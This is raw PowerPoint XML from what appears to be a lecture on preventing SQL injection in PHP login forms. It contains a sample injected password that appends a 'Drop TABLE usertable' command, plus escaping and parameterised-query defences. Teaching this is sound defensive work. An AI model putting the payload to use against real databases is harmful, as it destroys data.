                        <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0">
                          <a:solidFill>
                            <a:sysClr val="windowText" lastClr="000000"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>‘123123’;</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="2400" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:sysClr val="windowText" lastClr="000000"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> Drop TABLE </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="2400" baseline="0" dirty="0" err="1">
                          <a:solidFill>
                            <a:sysClr val="windowText" lastClr="000000"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>usertable</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="2400" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:sysClr val="windowText" lastClr="000000"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>;</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" altLang="ko-KR"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8" name="Picture 7"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1961078" y="3428999"/>
            <a:ext cx="2989411" cy="1309575"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="14" name="Picture 13"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4"/>
          <a:srcRect t="30061" b="49895"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2075487" y="3903740"/>
            <a:ext cx="2875002" cy="263670"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="28575" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B59055C1-AF73-954F-89A6-D095ADCF037B}"/>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27</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3328877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Attacks example</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1114424" y="2128244"/>
            <a:ext cx="7610476" cy="4138086"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0"/>
              <a:t>The following image shows the example of the SQL injection:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>Then, how can we prevent the SQL Injection attacks?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="677235" y="3167464"/>
            <a:ext cx="8223187" cy="2548203"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AC0CAD7C-C175-5944-A63A-FCF50DCE7E5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28</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="237301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600521"/>
            <a:ext cx="8359485" cy="974630"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Prevent SQL injection attacks </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="388307" y="2535382"/>
            <a:ext cx="8567803" cy="4078360"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Then, how to prevent those SQL injection attacks.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>The most common solution is using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>mysqli</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>-&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>real_escape_string</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>real_escape_string</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> function escapes special characters in a string for use in an SQL statement</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="4" name="표 5"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst/>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="665880" y="4684293"/>
          <a:ext cx="7468439" cy="1391818"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr>
                <a:tableStyleId>{5C22544A-7EE6-4342-B048-85BDC9FD1C3A}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="7468439">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20000"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="1391818">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr latinLnBrk="1"/>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1800" b="1" dirty="0">
                          <a:solidFill>
                            <a:sysClr val="windowText" lastClr="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>$username = $</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1800" b="1" dirty="0" err="1">
                          <a:solidFill>
                            <a:sysClr val="windowText" lastClr="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>mysqli</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1800" b="1" dirty="0">
                          <a:solidFill>
                            <a:sysClr val="windowText" lastClr="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>-&gt;</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1800" b="1" dirty="0" err="1">
                          <a:solidFill>
                            <a:sysClr val="windowText" lastClr="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>real_escape</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1800" b="1" baseline="0" dirty="0" err="1">
                          <a:solidFill>
                            <a:sysClr val="windowText" lastClr="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>_string</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1800" b="1" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:sysClr val="windowText" lastClr="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>(</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1800" b="1" dirty="0">
                          <a:solidFill>
                            <a:sysClr val="windowText" lastClr="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>$_POST[ ‘username’ ]);</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr latinLnBrk="1"/>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1800" b="1" dirty="0">
                          <a:solidFill>
                            <a:sysClr val="windowText" lastClr="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>$password = $</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1800" b="1" dirty="0" err="1">
                          <a:solidFill>
                            <a:sysClr val="windowText" lastClr="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>mysqli</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1800" b="1" dirty="0">
                          <a:solidFill>
                            <a:sysClr val="windowText" lastClr="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>-&gt;</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1800" b="1" dirty="0" err="1">
                          <a:solidFill>
                            <a:sysClr val="windowText" lastClr="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>real_escape</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1800" b="1" baseline="0" dirty="0" err="1">
                          <a:solidFill>
                            <a:sysClr val="windowText" lastClr="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>_string</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1800" b="1" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:sysClr val="windowText" lastClr="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>(</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1800" b="1" dirty="0">
                          <a:solidFill>
                            <a:sysClr val="windowText" lastClr="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>$_POST[ ‘password’ ]);</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr latinLnBrk="1"/>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1800" dirty="0">
                          <a:solidFill>
                            <a:sysClr val="windowText" lastClr="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>$query = “SELECT * FROM </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1800" dirty="0" err="1">
                          <a:solidFill>
                            <a:sysClr val="windowText" lastClr="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>usertable</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1800" dirty="0">
                          <a:solidFill>
                            <a:sysClr val="windowText" lastClr="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t> WHERE username=‘$username’ AND password=’$password’”;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Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{957B03C2-4FC0-D846-8F96-3877D2F690C9}"/>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29</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="107519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Confidentiality (C),</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Integrity (I),</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Availability (A), and</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Authentication (A)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5707ED14-578D-7747-92CD-2950C7FD98E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a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="247952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Prevent SQL injection attacks </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="207818" y="2187036"/>
            <a:ext cx="8517082" cy="4079294"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>With </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>real_escape_string</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>, even if the attacker put the following password value into the form </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t>The SQL query will be generated as follows:</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표 5"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst/>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1133399" y="4950207"/>
          <a:ext cx="7328263" cy="978924"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr>
                <a:tableStyleId>{5C22544A-7EE6-4342-B048-85BDC9FD1C3A}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="7328263">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20000"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="978924">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr latinLnBrk="1"/>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="2200" dirty="0">
                          <a:solidFill>
                            <a:sysClr val="windowText" lastClr="000000"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>SELECT * FROM </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="2200" dirty="0" err="1">
                          <a:solidFill>
                            <a:sysClr val="windowText" lastClr="000000"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>usertable</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="2200" dirty="0">
                          <a:solidFill>
                            <a:sysClr val="windowText" lastClr="000000"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> WHERE username=‘Soonja’ AND password=</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="2200" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="BF3D28"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>‘</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="2200" dirty="0">
                          <a:solidFill>
                            <a:sysClr val="windowText" lastClr="000000"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>123123</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="2200" b="1" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="FF0000"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>\</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="2200" b="0" dirty="0">
                          <a:solidFill>
                            <a:sysClr val="windowText" lastClr="000000"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>’</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="2200" dirty="0">
                          <a:solidFill>
                            <a:sysClr val="windowText" lastClr="000000"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>;</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="2200" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:sysClr val="windowText" lastClr="000000"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> Drop TABLE </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="2200" baseline="0" dirty="0" err="1">
                          <a:solidFill>
                            <a:sysClr val="windowText" lastClr="000000"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>usertable</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="2200" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="BF3D28"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>’</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="2200" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:sysClr val="windowText" lastClr="000000"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>; </a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2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표 5"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst/>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1396637" y="3170648"/>
          <a:ext cx="5811557" cy="463840"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr>
                <a:tableStyleId>{5C22544A-7EE6-4342-B048-85BDC9FD1C3A}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="5811557">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20000"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="463840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr latinLnBrk="1"/>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0">
                          <a:solidFill>
                            <a:sysClr val="windowText" lastClr="000000"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>123123’;</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="2400" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:sysClr val="windowText" lastClr="000000"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> Drop TABLE </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="2400" baseline="0" dirty="0" err="1">
                          <a:solidFill>
                            <a:sysClr val="windowText" lastClr="000000"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>usertable</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="2400" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:sysClr val="windowText" lastClr="000000"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>;</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" altLang="ko-KR" sz="18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rotWithShape="1">
          <a:blip r:embed="rId3"/>
          <a:srcRect t="30061" b="49895"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1475778" y="3939014"/>
            <a:ext cx="2692400" cy="246923"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="28575" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{47394239-6376-0240-953C-090E0260E3C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30</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="236789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Prevent SQL injection attacks </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="429491" y="2151760"/>
            <a:ext cx="8589571" cy="4503410"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>However, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>real_escape_string</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> function cannot prevent all SQL injections. This is because attacker also know what kind of input data in the form will be prevented</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>There are various techniques for preventing SQL injection:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Use query in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>parameterised</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> way</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>e.g. make user supply the values in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>parameterised</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> way (using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>bind_param</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> function)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" b="1" dirty="0"/>
              <a:t>Whitelisting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0"/>
              <a:t>: only allow input within well-defined set</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Define the regular expression to detect invalid inputs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>e.g. checking the regular expression for the email value</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1">
              <a:spcBef>
                <a:spcPts val="2000"/>
